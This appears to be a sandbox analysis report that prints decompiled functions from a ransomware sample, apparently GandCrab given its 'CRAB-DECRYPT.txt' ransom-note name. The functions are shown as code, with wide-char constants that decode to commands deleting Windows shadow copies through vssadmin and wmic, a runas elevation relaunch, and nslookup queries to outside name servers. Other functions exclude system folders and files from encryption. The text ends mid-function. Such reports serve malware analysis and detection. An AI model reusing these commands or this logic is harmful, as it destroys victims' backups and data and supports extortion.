Associated: 0000000B.00000002.328006726.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328020862.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_f580000_mqsmvj.jbxd

Yara matches

Similarity

API ID: Virtual$Alloc$wsprintf$BinaryCryptFreeStringlstrlen
String ID:
API String ID: 2885909284-0
Opcode ID: 1c3e15ce2155035e1a844b310ab77a685595f73c5932aacd8e80f45a61b14a9e
Instruction ID: a83d69dc5258653c6a042d178f46c16b156452a6d42c6daa0fb1e0cc63240257
Opcode Fuzzy Hash: 1c3e15ce2155035e1a844b310ab77a685595f73c5932aacd8e80f45a61b14a9e
Instruction Fuzzy Hash: D821A571A413197FEB11AB64CC81F9ABFECEF49B50F100065F644F7281D7B56A128B94

Uniqueness

Uniqueness Score: -1.00%

Function 0F5845B0 Relevance: 78.8, APIs: 5, Strings: 40, Instructions: 99
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E0F5845B0(void* __eflags) {
				short _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				char _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				char _v120;
				short _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				char _v152;
				short _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				char _v172;
				short* _v176;
				short* _t51;
				WCHAR* _t59;
				void* _t62;
				signed int _t66;
				void* _t69;

				if(E0F583CF0(_t62) == 0) {
					_v172 = 0x63005c;
					_v168 = 0x64006d;
					_v8 = 0;
					_t59 =  &_v172;
					_v164 = 0x65002e;
					_t51 =  &_v84;
					_v160 = 0x650078;
					_v156 = 0;
					_v84 = 0x63002f;
					_v80 = 0x760020;
					_v76 = 0x730073;
					_v72 = 0x640061;
					_v68 = 0x69006d;
					_v64 = 0x20006e;
					_v60 = 0x650064;
					_v56 = 0x65006c;
					_v52 = 0x650074;
					_v48 = 0x730020;
					_v44 = 0x610068;
					_v40 = 0x6f0064;
					_v36 = 0x730077;
					_v32 = 0x2f0020;
					_v28 = 0x6c0061;
					_v24 = 0x20006c;
					_v20 = 0x71002f;
					_v16 = 0x690075;
					_v12 = 0x740065;
				} else {
					_v152 = 0x77005c;
					_v148 = 0x650062;
					_t59 =  &_v152;
					_v144 = 0x5c006d;
					_t51 =  &_v120;
					_v140 = 0x6d0077;
					_v136 = 0x630069;
					_v132 = 0x65002e;
					_v128 = 0x650078;
					_v124 = 0;
					_v120 = 0x680073;
					_v116 = 0x640061;
					_v112 = 0x77006f;
					_v108 = 0x6f0063;
					_v104 = 0x790070;
					_v100 = 0x640020;
					_v96 = 0x6c0065;
					_v92 = 0x740065;
					_v88 = 0x65;
				}
				_v176 = _t51;
				_t69 = VirtualAlloc(0, 0x400, 0x3000, 0x40);
				if(_t69 != 0) {
					GetSystemDirectoryW(_t69, 0x100);
					lstrcatW(_t69, _t59);
					ShellExecuteW(0, L"open", _t69, _v176, 0, 0);
					asm("sbb edi, edi");
					_t66 =  ~0x20;
				} else {
					_t66 = 0;
				}
				VirtualFree(_t69, 0, 0x8000);
				return _t66;
			}

APIs

Part of subcall function 0F583CF0: _memset.LIBCMT ref: 0F583D42
Part of subcall function 0F583CF0: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000020,00000003,?,?,00000000), ref: 0F583D66
Part of subcall function 0F583CF0: VerSetConditionMask.KERNEL32(00000000,?,?,?,00000000), ref: 0F583D6A
Part of subcall function 0F583CF0: VerSetConditionMask.KERNEL32(00000000,?,?,?,?,00000000), ref: 0F583D6E
Part of subcall function 0F583CF0: VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 0F583D95

VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000040), ref: 0F58476F
GetSystemDirectoryW.KERNEL32(00000000,00000100), ref: 0F584785
lstrcatW.KERNEL32(00000000,0063005C), ref: 0F58478D
ShellExecuteW.SHELL32(00000000,open,00000000,?,00000000,00000000), ref: 0F5847A3
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F5847B7

Strings

, xrefs: 0F584716
\, xrefs: 0F584662
w, xrefs: 0F5845EE
d, xrefs: 0F584700
l, xrefs: 0F58472C
p, xrefs: 0F584633
\, xrefs: 0F5845CE
d, xrefs: 0F5846C9
s, xrefs: 0F584613
/, xrefs: 0F584699
a, xrefs: 0F584721
h, xrefs: 0F5846F5
t, xrefs: 0F5846DF
a, xrefs: 0F5846B1
u, xrefs: 0F584742
x, xrefs: 0F58468C
n, xrefs: 0F5846C1
open, xrefs: 0F58479C
w, xrefs: 0F58470B
i, xrefs: 0F5845F6
m, xrefs: 0F58466C
., xrefs: 0F5845FE
o, xrefs: 0F584623
, xrefs: 0F5846EA
, xrefs: 0F5846A1
., xrefs: 0F584680
x, xrefs: 0F584606
c, xrefs: 0F58462B
m, xrefs: 0F5846B9
/, xrefs: 0F584737
a, xrefs: 0F58461B
e, xrefs: 0F58464B
, xrefs: 0F58463B
s, xrefs: 0F5846A9
l, xrefs: 0F5846D4
e, xrefs: 0F584653
b, xrefs: 0F5845D6
m, xrefs: 0F5845E2
e, xrefs: 0F584643
e, xrefs: 0F58474D

Memory Dump Source

Source File: 0000000B.00000002.327997550.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true

Associated: 0000000B.00000002.327992363.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328006726.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328020862.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_f580000_mqsmvj.jbxd

Yara matches

Similarity

API ID: ConditionMask$Virtual$AllocDirectoryExecuteFreeInfoShellSystemVerifyVersion_memsetlstrcat
String ID: $ $ $ $.$.$/$/$\$\$a$a$a$b$c$d$d$e$e$e$e$h$i$l$l$m$m$m$n$o$open$p$s$s$t$u$w$w$x$x
API String ID: 2684037697-4098772853
Opcode ID: 2721502352ce87719c533d23392500906fc6ebd20e50e51f0bcadfb3ff19e96e
Instruction ID: fb37b0ca9acd9cf7a391135b8aef121d0ef4e56d2813acd1580c48b63c9d3d27
Opcode Fuzzy Hash: 2721502352ce87719c533d23392500906fc6ebd20e50e51f0bcadfb3ff19e96e
Instruction Fuzzy Hash: 294148B0108380DFE320DF218948B5BBFE2BB85B49F10491DEA985A291C7F6854DCF97

Uniqueness

Uniqueness Score: -1.00%

Function 0F583DB0 Relevance: 77.1, APIs: 9, Strings: 35, Instructions: 109
memorysynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0F583DB0(void* __ecx, void* __edx, void* __eflags) {
				char _v1020;
				short _v1028;
				char _v1532;
				short _v1540;
				intOrPtr _v1548;
				intOrPtr _v1552;
				intOrPtr _v1556;
				intOrPtr _v1560;
				intOrPtr _v1564;
				intOrPtr _v1568;
				intOrPtr _v1572;
				intOrPtr _v1576;
				intOrPtr _v1580;
				intOrPtr _v1584;
				intOrPtr _v1588;
				intOrPtr _v1592;
				intOrPtr _v1596;
				intOrPtr _v1600;
				intOrPtr _v1604;
				intOrPtr _v1608;
				intOrPtr _v1612;
				intOrPtr _v1616;
				short _v1620;
				intOrPtr _v1624;
				intOrPtr _v1628;
				intOrPtr _v1632;
				intOrPtr _v1636;
				intOrPtr _v1640;
				intOrPtr _v1644;
				intOrPtr _v1648;
				intOrPtr _v1652;
				intOrPtr _v1656;
				intOrPtr _v1660;
				intOrPtr _v1664;
				intOrPtr _v1668;
				intOrPtr _v1672;
				short _v1676;
				char _v1680;
				int _t54;
				struct HWND__* _t62;
				long _t66;
				void* _t76;
				void* _t78;
				void* _t80;

				_t78 = __ecx;
				_t54 = E0F583CF0(__edx);
				if(_t54 != 0) {
					_t54 = E0F583C70();
					if(_t54 == 0) {
						_v1676 = 0x770025;
						_v1672 = 0x6e0069;
						_v1668 = 0x690064;
						_v1664 = 0x250072;
						_v1660 = 0x73005c;
						_v1656 = 0x730079;
						_v1652 = 0x650074;
						_v1648 = 0x33006d;
						_v1644 = 0x5c0032;
						_v1640 = 0x620077;
						_v1636 = 0x6d0065;
						_v1632 = 0x77005c;
						_v1628 = 0x69006d;
						_v1624 = 0x63;
						ExpandEnvironmentStringsW( &_v1676,  &_v1540, 0xff);
						_v1620 = 0x720070;
						_v1616 = 0x63006f;
						_v1612 = 0x730065;
						_v1608 = 0x200073;
						_v1604 = 0x610063;
						_v1600 = 0x6c006c;
						_v1596 = 0x630020;
						_v1592 = 0x650072;
						_v1588 = 0x740061;
						_v1584 = 0x200065;
						_v1580 = 0x630022;
						_v1576 = 0x64006d;
						_v1572 = 0x2f0020;
						_v1568 = 0x200063;
						_v1564 = 0x740073;
						_v1560 = 0x720061;
						_v1556 = 0x200074;
						_v1552 = 0x730025;
						_v1548 = 0x22;
						wsprintfW( &_v1028,  &_v1620, _t78);
						_t76 = VirtualAlloc(0, 0x3d, 0x3000, 0x40);
						 *_t76 = 0x3c;
						 *(_t76 + 4) = 0x40;
						_t62 = GetForegroundWindow();
						_t80 = 0;
						 *(_t76 + 8) = _t62;
						_v1680 = 0x750072;
						_v1676 = 0x61006e;
						_v1672 = 0x73;
						 *((intOrPtr*)(_t76 + 0xc)) =  &_v1680;
						 *((intOrPtr*)(_t76 + 0x10)) =  &_v1532;
						 *((intOrPtr*)(_t76 + 0x14)) =  &_v1020;
						 *(_t76 + 0x18) = 0;
						 *(_t76 + 0x1c) = 0;
						 *(_t76 + 0x20) = 0;
						while(1) {
							_t66 = ShellExecuteExW(_t76);
							if(_t66 != 0) {
								break;
							}
							_t80 = _t80 + 1;
							if(_t80 < 0x64) {
								continue;
							}
							_t54 = VirtualFree(_t76, _t66, 0x8000);
							goto L6;
						}
						WaitForSingleObject( *(_t76 + 0x38), 0xffffffff);
						CloseHandle( *(_t76 + 0x38));
						ExitProcess(0);
					}
				}
				L6:
				return _t54;
			}

APIs

Part of subcall function 0F583CF0: _memset.LIBCMT ref: 0F583D42
Part of subcall function 0F583CF0: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000020,00000003,?,?,00000000), ref: 0F583D66
Part of subcall function 0F583CF0: VerSetConditionMask.KERNEL32(00000000,?,?,?,00000000), ref: 0F583D6A
Part of subcall function 0F583CF0: VerSetConditionMask.KERNEL32(00000000,?,?,?,?,00000000), ref: 0F583D6E
Part of subcall function 0F583CF0: VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 0F583D95

Part of subcall function 0F583C70: AllocateAndInitializeSid.ADVAPI32(00000000,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0F583CA0

ExpandEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0F583E5D
wsprintfW.USER32 ref: 0F583F27
VirtualAlloc.KERNEL32(00000000,0000003D,00003000,00000040), ref: 0F583F3B
GetForegroundWindow.USER32 ref: 0F583F50
ShellExecuteExW.SHELL32(00000000), ref: 0F583FB1
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F583FC4
WaitForSingleObject.KERNEL32(?,000000FF), ref: 0F583FD6
CloseHandle.KERNEL32(?), ref: 0F583FDF
ExitProcess.KERNEL32 ref: 0F583FE7

Strings

, xrefs: 0F583EDA
a, xrefs: 0F583EFB
c, xrefs: 0F583EE5
s, xrefs: 0F583EF0
\, xrefs: 0F583E0D
a, xrefs: 0F583EB1
e, xrefs: 0F583EB9
c, xrefs: 0F583E91
n, xrefs: 0F583F6D
c, xrefs: 0F583E55
", xrefs: 0F583EC4
, xrefs: 0F583EA1
i, xrefs: 0F583DF4
o, xrefs: 0F583E78
p, xrefs: 0F583E68
%, xrefs: 0F583DE7
m, xrefs: 0F583E25
2, xrefs: 0F583E2D
t, xrefs: 0F583F06
\, xrefs: 0F583E45
r, xrefs: 0F583EA9
s, xrefs: 0F583E89
w, xrefs: 0F583E35
", xrefs: 0F583F1C
e, xrefs: 0F583E81
%, xrefs: 0F583F11
t, xrefs: 0F583E1D
l, xrefs: 0F583E99
d, xrefs: 0F583DFD
m, xrefs: 0F583ECF
y, xrefs: 0F583E15
e, xrefs: 0F583E3D
s, xrefs: 0F583F75
r, xrefs: 0F583F65
r, xrefs: 0F583E05

Memory Dump Source

Source File: 0000000B.00000002.327997550.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true

Associated: 0000000B.00000002.327992363.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328006726.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328020862.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_f580000_mqsmvj.jbxd

Yara matches

Similarity

API ID: ConditionMask$Virtual$AllocAllocateCloseEnvironmentExecuteExitExpandForegroundFreeHandleInfoInitializeObjectProcessShellSingleStringsVerifyVersionWaitWindow_memsetwsprintf
String ID: $ $"$"$%$%$2$\$\$a$a$c$c$c$d$e$e$e$i$l$m$m$n$o$p$r$r$r$s$s$s$t$t$w$y
API String ID: 561366689-3790645798
Opcode ID: 2d5441cc97f182e21739141cf843ecc5097a49877d9c44bad480227ee9ac69d9
Instruction ID: f084ac1c31428ad25061de51693550b6d875a6523ef945250586e709d6c8e080
Opcode Fuzzy Hash: 2d5441cc97f182e21739141cf843ecc5097a49877d9c44bad480227ee9ac69d9
Instruction Fuzzy Hash: DD5157B0008341EFE3208F10C548B9ABFF9BF84759F004A2DE6989A251D7FA915DCF92

Uniqueness

Uniqueness Score: -1.00%

Function 0F585060 Relevance: 61.4, APIs: 8, Strings: 27, Instructions: 118
pipememoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0F585060(CHAR* __ecx, void* __edx, WCHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				char _v72;
				short _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				char _v128;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t43;
				void* _t55;
				CHAR* _t62;
				void* _t64;

				_v72 = 0x73006e;
				_t55 = __edx;
				_v20 = 0;
				_t62 = __ecx;
				_v76 = 0;
				_v68 = 0x6f006c;
				_t41 =  !=  ?  &_v128 :  &_v72;
				_v64 = 0x6b006f;
				_a4 =  !=  ?  &_v128 :  &_v72;
				_v60 = 0x700075;
				_v56 = 0x250020;
				_v52 = 0x200053;
				_v48 = 0x73006e;
				_v44 = 0x2e0031;
				_v40 = 0x690076;
				_v36 = 0x6d0072;
				_v32 = 0x630061;
				_v28 = 0x2e0068;
				_v24 = 0x750072;
				_v128 = 0x73006e;
				_v124 = 0x6f006c;
				_v120 = 0x6b006f;
				_v116 = 0x700075;
				_v112 = 0x250020;
				_v108 = 0x200053;
				_v104 = 0x73006e;
				_v100 = 0x2e0032;
				_v96 = 0x690076;
				_v92 = 0x6d0072;
				_v88 = 0x630061;
				_v84 = 0x2e0068;
				_v80 = 0x750072;
				_v16.nLength = 0xc;
				_v16.bInheritHandle = 1;
				_v16.lpSecurityDescriptor = 0;
				_t43 = CreatePipe(0xf592a70, 0xf592a6c,  &_v16, 0);
				if(_t43 != 0) {
					_t43 = SetHandleInformation( *0xf592a70, 1, 0);
					if(_t43 == 0) {
						goto L1;
					} else {
						CreatePipe(0xf592a68, 0xf592a74,  &_v16, 0);
						_t43 = SetHandleInformation( *0xf592a74, 1, 0);
						if(_t43 == 0) {
							goto L1;
						} else {
							_t64 = VirtualAlloc(0, 0x2800, 0x3000, 4);
							if(_t64 == 0) {
								lstrcpyA(_t62, "fabian wosar <3");
								return 0;
							} else {
								wsprintfW(_t64, _a4, _t55);
								E0F584E10(_t64);
								E0F584FB0(_t55, _t62, _t55, _t62, _t64);
								VirtualFree(_t64, 0, 0x8000);
								return 0;
							}
						}
					}
				} else {
					L1:
					return _t43 | 0xffffffff;
				}
			}

APIs

CreatePipe.KERNEL32(0F592A70,0F592A6C,?,00000000,00000001,00000001,00000000), ref: 0F585165
SetHandleInformation.KERNEL32(00000001,00000000), ref: 0F585189
CreatePipe.KERNEL32(0F592A68,0F592A74,0000000C,00000000), ref: 0F58519F
SetHandleInformation.KERNEL32(00000001,00000000), ref: 0F5851AF
VirtualAlloc.KERNEL32(00000000,00002800,00003000,00000004), ref: 0F5851C3
wsprintfW.USER32 ref: 0F5851D4
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F5851F5

Strings

u, xrefs: 0F5850AF
a, xrefs: 0F5850E0
r, xrefs: 0F585149
o, xrefs: 0F585095
l, xrefs: 0F5850FC
, xrefs: 0F5850B6
v, xrefs: 0F5850D2
1, xrefs: 0F5850CB
r, xrefs: 0F5850EE
S, xrefs: 0F585118
h, xrefs: 0F5850E7
r, xrefs: 0F585134
o, xrefs: 0F585103
n, xrefs: 0F58511F
v, xrefs: 0F58512D
fabian wosar <3, xrefs: 0F585204
n, xrefs: 0F5850F5
u, xrefs: 0F58510A
S, xrefs: 0F5850BD
, xrefs: 0F585111
a, xrefs: 0F58513B
n, xrefs: 0F5850C4
l, xrefs: 0F58508B
2, xrefs: 0F585126
n, xrefs: 0F58506D
h, xrefs: 0F585142
r, xrefs: 0F5850D9

Memory Dump Source

Source File: 0000000B.00000002.327997550.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true

Associated: 0000000B.00000002.327992363.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328006726.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328020862.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_f580000_mqsmvj.jbxd

Yara matches

Similarity

API ID: CreateHandleInformationPipeVirtual$AllocFreewsprintf
String ID: $ $1$2$S$S$a$a$fabian wosar <3$h$h$l$l$n$n$n$n$o$o$r$r$r$r$u$u$v$v
API String ID: 1490407255-3072057902
Opcode ID: 315b0cbed8d65d982c82a46fd35c39bbff48465a2df2d78d32241635c60fe22e
Instruction ID: 8da1a7b584a6d7daf77cc5e32a920ffe955128b43e4ad9c8c8c528cfe2bfa8c4
Opcode Fuzzy Hash: 315b0cbed8d65d982c82a46fd35c39bbff48465a2df2d78d32241635c60fe22e
Instruction Fuzzy Hash: A2415C71E40308ABEB109F94DD487EDBFB6FB04759F104129E904BA281D7FA455A8F94

Uniqueness

Uniqueness Score: -1.00%

Function 0F5868F0 Relevance: 30.1, APIs: 11, Strings: 9, Instructions: 78
stringCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E0F5868F0(WCHAR* __ecx) {
				int _t4;
				signed int _t15;
				void* _t19;
				WCHAR* _t21;
				short* _t25;
				WCHAR* _t26;

				_t21 = __ecx;
				_t4 = lstrlenW(__ecx);
				_t25 = _t21 - 2 + lstrlenW(_t21) * 2;
				_t19 = _t4 - 1;
				if(_t19 != 0) {
					do {
						_t25 = _t25 - 2;
						_t19 = _t19 - 1;
					} while ( *_t25 != 0x5c && _t19 != 0);
				}
				_t26 = _t25 + 2;
				if(lstrcmpiW(_t26, L"desktop.ini") != 0) {
					if(lstrcmpiW(_t26, L"autorun.inf") == 0 || lstrcmpiW(_t26, L"ntuser.dat") == 0 || lstrcmpiW(_t26, L"iconcache.db") == 0 || lstrcmpiW(_t26, L"bootsect.bak") == 0 || lstrcmpiW(_t26, L"boot.ini") == 0 || lstrcmpiW(_t26, L"ntuser.dat.log") == 0 || lstrcmpiW(_t26, L"thumbs.db") == 0) {
						goto L5;
					} else {
						_t15 = lstrcmpiW(_t26, L"CRAB-DECRYPT.txt");
						asm("sbb eax, eax");
						return  ~_t15 + 1;
					}
				} else {
					L5:
					return 1;
				}
			}

0x0f5868f9
0x0f5868fc
0x0f586906
0x0f586909
0x0f58690a
0x0f586910
0x0f586910
0x0f586913
0x0f586914
0x0f586910
0x0f586924
0x0f586931
0x0f586946
0x00000000
0x0f586990
0x0f586996
0x0f58699b
0x0f5869a0
0x0f5869a0
0x0f586935
0x0f586935
0x0f58693b
0x0f58693b

APIs

lstrlenW.KERNEL32 ref: 0F5868FC
lstrlenW.KERNEL32 ref: 0F586901
lstrcmpiW.KERNEL32(?,desktop.ini), ref: 0F58692D
lstrcmpiW.KERNEL32(?,autorun.inf), ref: 0F586942
lstrcmpiW.KERNEL32(?,ntuser.dat), ref: 0F58694E
lstrcmpiW.KERNEL32(?,iconcache.db), ref: 0F58695A
lstrcmpiW.KERNEL32(?,bootsect.bak), ref: 0F586966
lstrcmpiW.KERNEL32(?,boot.ini), ref: 0F586972
lstrcmpiW.KERNEL32(?,ntuser.dat.log), ref: 0F58697E
lstrcmpiW.KERNEL32(?,thumbs.db), ref: 0F58698A
lstrcmpiW.KERNEL32(?,CRAB-DECRYPT.txt), ref: 0F586996

Strings

CRAB-DECRYPT.txt, xrefs: 0F586990
iconcache.db, xrefs: 0F586954
thumbs.db, xrefs: 0F586984
ntuser.dat.log, xrefs: 0F586978
boot.ini, xrefs: 0F58696C
bootsect.bak, xrefs: 0F586960
desktop.ini, xrefs: 0F586927
autorun.inf, xrefs: 0F58693C
ntuser.dat, xrefs: 0F586948

Memory Dump Source

Source File: 0000000B.00000002.327997550.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true

Associated: 0000000B.00000002.327992363.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328006726.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328020862.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_f580000_mqsmvj.jbxd

Yara matches

Similarity

API ID: lstrcmpi$lstrlen
String ID: CRAB-DECRYPT.txt$autorun.inf$boot.ini$bootsect.bak$desktop.ini$iconcache.db$ntuser.dat$ntuser.dat.log$thumbs.db
API String ID: 203586893-3936223242
Opcode ID: 3b1154fdaae42e0514b1dc947d1580bd14000208d25efafdcf74f00b8058e6b7
Instruction ID: cd6451f024e767dec442da0242c67cd43a98bdaaad60d562859ccd19e01c8704
Opcode Fuzzy Hash: 3b1154fdaae42e0514b1dc947d1580bd14000208d25efafdcf74f00b8058e6b7
Instruction Fuzzy Hash: DB11CE627806A6755B20367DAD01EEF13CCBDD6F90385023AF904F2083EB99EE1384B5

Uniqueness

Uniqueness Score: -1.00%

Function 0F586780 Relevance: 28.1, APIs: 7, Strings: 9, Instructions: 124
memoryCOMMON

Download Yara Rule

C-Code - Quality: 19%

			E0F586780(void* __ecx) {
				void* _t12;
				intOrPtr* _t23;
				void* _t51;
				void* _t52;

				_t52 = __ecx;
				_t51 = VirtualAlloc(0, 0x201, 0x3000, 0x40);
				if(E0F5881F0(_t52, L"\\ProgramData\\") != 0 || E0F5881F0(_t52, L"\\IETldCache\\") != 0 || E0F5881F0(_t52, L"\\Boot\\") != 0 || E0F5881F0(_t52, L"\\Program Files\\") != 0 || E0F5881F0(_t52, L"\\Tor Browser\\") != 0 || E0F5881F0(_t52, L"Ransomware") != 0 || E0F5881F0(_t52, L"\\All Users\\") != 0 || E0F5881F0(_t52, L"\\Local Settings\\") != 0) {
					L18:
					VirtualFree(_t51, 0, 0x8000);
					return 0;
				} else {
					_t12 = E0F5881F0(_t52, L"\\Windows\\");
					if(_t12 != 0) {
						goto L18;
					} else {
						_t23 = __imp__SHGetSpecialFolderPathW;
						_push(_t12);
						_push(0x2a);
						_push(_t51);
						_push(_t12);
						if( *_t23() == 0 || E0F5881F0(_t52, _t51) == 0) {
							_push(0);
							_push(0x2b);
							_push(_t51);
							_push(0);
							if( *_t23() == 0 || E0F5881F0(_t52, _t51) == 0) {
								_push(0);
								_push(0x24);
								_push(_t51);
								_push(0);
								if( *_t23() == 0 || E0F5881F0(_t52, _t51) == 0) {
									_push(0);
									_push(0x1c);
									_push(_t51);
									_push(0);
									if( *_t23() == 0 || E0F5881F0(_t52, _t51) == 0) {
										VirtualFree(_t51, 0, 0x8000);
										return 1;
									} else {
										goto L18;
									}
								} else {
									goto L18;
								}
							} else {
								goto L18;
							}
						} else {
							goto L18;
						}
					}
				}
			}

APIs

VirtualAlloc.KERNEL32(00000000,00000201,00003000,00000040,00000000,?,?,0F586E06,00000000,?,?), ref: 0F586793
SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002A,00000000,?,?,0F586E06,00000000,?,?), ref: 0F58685A
SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002B,00000000,?,?,0F586E06,00000000,?,?), ref: 0F586874
SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000024,00000000,?,?,0F586E06,00000000,?,?), ref: 0F58688E
SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?,?,0F586E06,00000000,?,?), ref: 0F5868A8
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,0F586E06,00000000,?,?), ref: 0F5868C8
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,0F586E06,00000000,?,?), ref: 0F5868DD

Strings

\ProgramData\, xrefs: 0F586799
Ransomware, xrefs: 0F5867FF
\Program Files\, xrefs: 0F5867D7
\Local Settings\, xrefs: 0F586827
\Windows\, xrefs: 0F58683B
\Boot\, xrefs: 0F5867C3
\IETldCache\, xrefs: 0F5867AF
\Tor Browser\, xrefs: 0F5867EB
\All Users\, xrefs: 0F586813

Memory Dump Source

Source File: 0000000B.00000002.327997550.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true

Associated: 0000000B.00000002.327992363.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328006726.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328020862.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_f580000_mqsmvj.jbxd

Yara matches

Similarity

API ID: FolderPathSpecial$Virtual$Free$Alloc
String ID: Ransomware$\All Users\$\Boot\$\IETldCache\$\Local Settings\$\Program Files\$\ProgramData\$\Tor Browser\$\Windows\
API String ID: 1363212851-3735464813
Opcode ID: 12619a8fe19732222dd493198db7ad9a0c3e6e1636b14e5343d4320dd0b6aeef
Instruction ID: 39386b1874398073fcb3d2cddaedfcb22535d72e04910fdab950d4ea3d1c13d8
Opcode Fuzzy Hash: 12619a8fe19732222dd493198db7ad9a0c3e6e1636b14e5343d4320dd0b6aeef
Instruction Fuzzy Hash: 1531E12074076222EA6432660D55B2F4BDAABD9E56F914035AA05FF2C2EF58DC0387A9

Uniqueness

Uniqueness Score: -1.00%

Function 0F585220 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 91
memorystringsleepCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E0F585220() {
				WCHAR* _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v20;
				char _v24;
				char* _v28;
				char* _v32;
				char* _v36;
				short _v40;
				char _v56;
				short _v60;
				intOrPtr _v64;
				char _v80;
				WCHAR* _t26;
				intOrPtr _t27;
				long _t32;
				WCHAR* _t37;
				void* _t39;
				signed int _t40;
				signed int _t41;
				signed int _t45;
				void* _t48;
				WCHAR* _t49;
				void* _t52;
				void* _t53;

				asm("movdqa xmm0, [0xf590540]");
				_v36 =  &_v56;
				asm("movdqu [ebp-0x34], xmm0");
				_v32 =  &_v80;
				asm("movdqa xmm0, [0xf590520]");
				_v40 = 0x74;
				asm("movdqu [ebp-0x4c], xmm0");
				_v64 = 0x69622e6d;
				_v60 = 0x74;
				_v24 = 0x62636467;
				_v20 = 0x7469622e;
				_v16 = 0;
				_v28 =  &_v24;
